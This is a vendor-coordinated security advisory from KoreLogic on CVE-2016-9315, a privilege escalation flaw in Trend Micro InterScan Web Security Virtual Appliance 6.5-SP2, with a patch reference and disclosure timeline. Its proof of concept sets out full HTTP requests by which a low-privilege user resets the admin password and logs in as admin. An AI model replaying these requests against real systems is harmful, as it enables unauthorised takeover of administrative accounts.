KL-001-2017-002 : Trendmicro InterScan Privilege Escalation Vulnerability Title: Trendmicro InterScan Privilege Escalation Vulnerability Advisory ID: KL-001-2017-002 Publication Date: 2017.02.15 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-002.txt 1. Vulnerability Details Affected Vendor: Trendmicro Affected Product: InterScan Web Security Virtual Appliance Affected Version: OS Version 3.5.1321.el6.x86_64; Application Version 6.5-SP2_Build_Linux_1548 Platform: Embedded Linux CWE Classification: CWE-269: Improper Privilege Management Impact: Privilege Escalation Attack vector: HTTP CVE-ID: CVE-2016-9315 2. Vulnerability Description Any authenticated user can execute administrative functionality 3. Technical Description 1. Login as least privileged user role. POST /uilogonsubmit.jsp HTTP/1.1 Host: 1.3.3.8:8443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://1.3.3.8:8443/logon.jsp Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 62 wherefrom=&wronglogon=no&uid=reports&passwd=reports&pwd=Log+On HTTP/1.1 302 Found Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&summary_scan Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Tue, 25 Oct 2016 15:02:24 GMT Connection: close 2. Use session identifier to run administrator functionality to change admin password. POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1 Host: 1.3.3.8:8443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://1.3.3.8:8443/login_account_add_modify.jsp?CSRFGuardToken=9RN5D8EPS3MS4R5BCQMR3KE4SHPVCMZV&op=review&uid=admin Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 280 CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&accountop=review&allaccount=admin&allaccount=auditor&allaccount=reports&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=korelogic2&PASS2=korelogic2&description=Master+Administrator&role_select=0&roleid=0 HTTP/1.1 302 Found Server: Apache-Coyote/1.1 Location: https://1.3.3.8:8443/login_accounts.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK Content-Length: 0 Date: Tue, 25 Oct 2016 15:03:37 GMT Connection: close 3. Login as admin POST /uilogonsubmit.jsp HTTP/1.1 Host: 1.3.3.8:8443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://1.3.3.8:8443/logout.jsp?CSRFGuardToken=VS0DHVK4Q9T7GJF0N08812Y5FNTNT67M Cookie: JSESSIONID=6903A112B76F642A05573990BB3057DB DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 27 uid=admin&passwd=korelogic2 HTTP/1.1 302 Found Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=IDVSTBAEVTSQOP6GJWZI3BDZZVBKAYW4&summary_scan Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Tue, 25 Oct 2016 15:03:54 GMT Connection: close 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability in Version 6.5 CP 1737. Security advisory and link to the patched version available at: https://success.trendmicro.com/solution/1116672 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.12.12 - KoreLogic sends vulnerability report and PoC to Trendmicro. 2016.12.12 - Trendmicro acknowledges receipt of report. 2017.01.11 - Trendmicro informs KoreLogic that the patch to this and other KoreLogic reported issues will likely be available after the 45 business day deadline (2017.02.16). 2017.02.06 - Trendmicro informs KoreLogic that the patched version will be available by 2017.02.14. 2017.02.14 - Trendmicro security advisory released. 2017.02.15 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt